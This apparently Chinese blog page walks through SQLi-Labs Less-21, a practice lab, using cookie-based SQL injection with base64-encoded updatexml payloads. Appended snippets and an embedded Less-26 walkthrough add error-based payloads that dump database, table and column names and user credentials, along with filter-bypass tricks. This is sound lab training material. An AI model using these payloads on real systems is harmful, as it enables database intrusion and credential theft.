SQLi LABS Less-21

已于 2024-06-23 18:14:32 修改
阅读量1.1w 收藏 3
点赞数 3
分类专栏: 《靶场实战》 文章标签: 网络安全 渗透测试 web安全 安全
于 2021-08-14 22:03:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangyuxiang946/article/details/119706614
版权

 「作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大

21关的突破口在cookie,用户登录成功后,将用户名进行base64加密后,保存在cookie中

点击提交按钮的时候,会从cookie中获取保存的用户名,使用base64解密后,查询数据库,来验证用户是否处于登录状态,我们可以修改cookie的值,从而进行SQL注入

 

先输入正确的用户名和密码,登录成功后刷新页面,并使用代理软件(Burp Suite)拦截请求,可以看到Cookie中保存了base64加密后的用户名

我们将用户名进行解密(先使用url解码,再使用base64解码),可获得编码前的用户名

我们将构造好的payload使用base64加密后再提交

1') and updatexml(1,0x7e,1) -- a

 加密后

MScpIGFuZCB1cGRhdGV4bWwoMSwweDdlLDEpIC0tIGE=

 报错成功,接下来修改payload脱库即可

sqli-labs 21——40关攻略
weixin_45880717的博客
02-02 1179
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 278
sql注入
sqli-labs less21
qq_45106794的博客
10-26 350
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
sqlilabs-Less-21
2301_80753596的博客
05-03 664
欢迎来到第21关,从第18关开始都算一种类型,后续会慢慢补全,这道题的前提是20要先学会,我们可以尝试登录一下,这道题是需要登录成功的情况下,才可以获取cookie,我猜模拟一个登录过程把,哈哈哈哈,现在还不是很懂。这里进行base64的一个加密,但是如果我们不进行加密然后发出去会怎么样呢,我们可以多尝试一些,多去总结一下类似的问题,可以去体验一下,我的建议毕竟初学者,多练练还是好的。如果心系的话,可以去看一下后端的原代码,这里放出来给大家看一下,我们可以看到。6、爆数据库关键信息。
sqli-labs (less-21)
kukudeshuo的博客
03-11 371
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
sqli-labs————less 21
Fly_鹏程万里
05-12 1631
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
sqli-labsless-21
羽的博客
09-10 227
和20题很像。 然后一看cookie是一个base64编码的,解码一下,是Dumb。 所以cookie一个是注入点,只是有个base64编码 随便提一下: base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 这样也就是要将原来的注入语句进行base64编码以后在放到cookie中进行注入。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T...
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 159
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
sqli-labs ----less-26---37--练习
代码审计
03-07 1060
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1288
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1840
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2294
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 530
Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
sqli-labs/Less-21
m0_71299382的博客
11-19 340
sqli-labs第二十一关
Sqlilabs-21
KAKA的博客
07-09 679
来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
Sqlilabs Less-21
Light_inthe_eyes的博客
03-10 313
登录成功后,burpsuite抓包,发现cookie是加了密: 去网上找解密工具: 接下来的cookie注入也应base64加密 爆表:
sqli-labs通关(less21~less30)
箭雨镜屋
09-03 4049
Less21 这关刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这关的GET报文,就和上一关不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
SQLi-LABSLess21-30分析
haoahaoahaoahao的博客
02-29 909
id=1'))报错,加入注释符--+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//'?id=1' or 1=1 or'显示正常了,?id=1') or 1=1 or'或者?id=1')) or 1=1 or'报错,那么注入点为'输入语句。被过滤的字符,可用其他的字符进行替代,用"%a0"或"%0b"替代空格,用"||"替代"or",使用"%26%26"替代"and"id=1")%0Bor%0B("1")=("1报错,?id=1"%0bor%0b"1"="1正常。
Sqli-Lab | Less 21-23
酉酉的博客
02-08 631
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
sqlilabs less-26
最新发布
05-06
<think>好的,用户想要解决SQLiLabs Less-26的挑战,我需要先回顾一下这个关卡的特点。Less-26通常涉及绕过过滤机制,比如过滤空格、注释符或者某些关键词。根据提供的引用内容,之前的关卡如Less-36提到使用GBK编码绕过转义,而Less-11、12和48使用了报错注入技术,比如extractvalue和updatexml函数。此外,Less-34涉及UTF编码的知识,可能与字符编码有关。 首先,我需要确认Less-26的具体过滤规则。根据经验,Less-26可能过滤了空格、注释符(如--+或#),可能还有某些关键字如union、select等。用户可能需要使用替代字符绕过过滤,比如用%a0代替空格,或者使用括号包裹注入语句。例如,使用报错注入时,需要确保闭合单引号,并绕过空格过滤。 接下来,构造注入语句。例如,爆库名时,可能需要用报错函数,结合concat和0x7e符号。同时,替换空格为%a0或使用括号。例如:'or(updatexml(1,concat(0x7e,(select database())),1))%26%26'a'='a。这里需要注意闭合原查询的单引号,并使用逻辑运算符绕过过滤。 另外,考虑字符编码的问题,可能需要调整字符集,如GBK,但根据引用[1],这需要设置正确的字符集。不过Less-26是否涉及字符集绕过还不确定,可能需要结合其他方法。 用户可能需要逐步测试过滤的字符,尝试不同的替代方法,比如使用双重编码或特定符号代替空格。同时,确保注入语句的正确闭合,避免语法错误。在获取表名和字段名时,需要利用information_schema,并处理可能的过滤,例如将users表名用十六进制表示,避免单引号被过滤。 最后,总结步骤,帮助用户理解每个注入步骤的目的和方法,并提供相关问题以深化理解,如如何绕过其他过滤,替代空格的其他方法,以及报错注入的其他函数。</think>### SQLi-Labs Less-26 解决方案 #### 一、关卡特性分析 Less-26 是 SQLi-Labs 中针对**过滤空格和注释符**的注入挑战。主要过滤以下内容: 1. 空格(包括普通空格、`%20`、`+`) 2. 注释符(`--+`、`#`) 3. 部分关键词(如`union select`可能被拆分会失效) 引用示例中的报错注入技术[^2][^3]在此关卡仍适用,但需要绕过过滤规则。 --- #### 二、绕过过滤的核心方法 1. **替代空格的字符**: - `%a0`(URL 编码的不可见字符) - 使用括号`()`包裹语句 - 例如:`select(schema_name)from(information_schema.schemata)` 2. **绕过注释符**: - 通过逻辑运算符闭合语句,如 `'||'1'='1` 或 `'&&'1'='1` 3. **关键词拆分绕过**: - 使用双写、大小写混合或插入特殊符号(如`uni%a0on sele%a0ct`) --- #### 三、分步骤注入流程 ##### 1. 判断注入点 输入测试载荷: ```sql '||'1'='1 ``` 若返回正常页面,说明存在字符型注入。 ##### 2. 爆数据库名 使用报错注入函数`updatexml`,替代空格为`%a0`: ```sql 'or(updatexml(1,concat(0x7e,(select%a0database())),1))%26%26'a'='a ``` - `%26%26` 是 `&&` 的 URL 编码 - 输出示例:`XPATH syntax error: '~security'` → 数据库名为 `security`[^3] ##### 3. 爆表名 ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database())),1))%26%26'a'='a ``` 输出示例:`~emails,referers,uagents,users` ##### 4. 爆字段名(以 `users` 表为例) ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name='users')),1))%26%26'a'='a ``` 输出示例:`~id,username,password` ##### 5. 提取数据 ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(username,0x3a,password)%a0from%a0users)),1))%26%26'a'='a ``` 输出示例:`~Dumb:Dumb,Angelina:...` --- #### 四、防御措施(参考引用[^1]) 若开发中需防范此类攻击: 1. 使用 `mysql_real_escape_string()` 前设置字符集为 `gbk`: ```php mysql_set_charset('gbk', $conn); ``` 2. 使用预编译语句(PDO/MySQLi---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值